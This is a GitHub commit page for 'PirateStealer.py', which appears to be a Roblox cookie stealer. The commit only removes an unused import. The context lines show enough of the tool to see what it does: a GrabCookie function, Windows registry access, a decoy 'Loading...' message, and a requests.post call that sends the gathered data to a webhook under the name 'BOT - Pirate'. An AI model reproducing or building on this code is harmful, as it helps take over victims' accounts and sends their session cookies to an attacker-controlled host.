Skip to content

Commit

Permalink
Update PirateStealer.py
Browse files Browse the repository at this point in the history
  • Loading branch information
Mani175 authored Jun 9, 2022
1 parent 92020d8 commit 23e95a6
Showing 1 changed file with 1 addition and 2 deletions.
3 changes: 1 addition & 2 deletions PirateStealer.py
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,6 @@
import requests
from winreg import OpenKey, HKEY_CURRENT_USER, EnumValue
import robloxpy
import robloxapi
import json

dummy_Message = "Loading..." #change this to whatever you want
Expand Down Expand Up @@ -53,4 +52,4 @@ def GrabCookie():
'username' : "BOT - Pirate 💎"
}

requests.post(webhook,data=data)
requests.post(webhook,data=data)

0 comments on commit 23e95a6

Please sign in to comment.